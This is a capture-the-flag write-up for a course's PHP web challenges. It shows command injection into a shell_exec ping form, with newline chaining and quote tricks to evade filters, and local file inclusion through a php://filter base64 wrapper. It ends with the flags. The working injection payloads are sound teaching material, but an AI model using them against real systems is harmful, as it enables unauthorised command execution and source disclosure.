wk10 - PHP

Theme: web exploit, local file inclusion, image uploads

ping (100)

Solve

User input is stored into a POST request variable called ip. This variable will be passed to php's shell_exec() function which takes in a command as a string and returns a single output also as a string. Try a few. We realize things like &, |, ; and space characters are banned. So we can't use them to chain two commands. Go research a little and find other ways to chain commands, like using the newline character %0A (url-encoded).

Enter this: 127.0.0.1%0Als

There's a php flag file shown in the output. We enter in the browser as URL: offsec-chalbroker.osiris.cyber.nyu.edu:1503/f14g_cmdi.php and the code runs. We see the flag rendered on the page.

An alternative solution is to directly inject the command to cat the flag php file content. cat is forbidden, but we can use single-quotes to escape it: 127.0.0.1%0Ac'a't%09f14g_cmdi.php

Flag

flag{now_you_have_command_to_my_army_snow!_e3a163e4db83ffaf}

LFI: local file inclusion (100)

Solve

This is a news website. From the URL, we see the parameter page in the query string, set to whatever page we are viewing. The page is generated by executing code from the corresponding php file specified by the value of parameter page. Let's try messing around with the parameter, setting it to something like "random". Enter and we receive:

**Warning**: require_once(random.php): failed to open stream: No such file or directory in **/var/www/html/index.php** on line **32**  
  
**Fatal error**: require_once(): Failed opening required 'random.php' (include_path='.:/usr/local/lib/php') in **/var/www/html/index.php** on line **32**

This indicates the value of page is appended to .php before the file is inserted and executed. It tells us we should enter the desired file name without .php.

Let's try to set page=flag to see if there's a flag file. We get the output "Can you find the flag?". This indicates the file does exist. It'll be helpful to leak the source code of this file. Do that by using php conversion filters, which are applied to the file to be included BEFORE its code is then executed.

Enter the following URL: http://offsec-chalbroker.osiris.cyber.nyu.edu:1500/index.php?page=php://filter/convert.base64-encode/resource=flag

We will get the source code of flag.php, base64-encoded: PD9waHAKLy9mbGFne1cwd19MRklfMXNfQzBPbCFfMmMyMmM0MTVkMmU3OTk3Zn0KPz4KQ2FuIHlvdSBmaW5kIHRoZSBmbGFnPw==

Let's decode this string in the terminal using echo "PD9waHAKLy9mbGFne1cwd19MRklfMXNfQzBPbCFfMmMyMmM0MTVkMmU3OTk3Zn0KPz4KQ2FuIHlvdSBmaW5kIHRoZSBmbGFnPw==" | base64 -d

The output is:

<?php
//flag{W0w_LFI_1s_C0Ol!_2c22c415d2e7997f}
?>

Can you find the flag?%

There's the flag, hiding in the comment!

Flag

flag{W0w_LFI_1s_C0Ol!_2c22c415d2e7997f}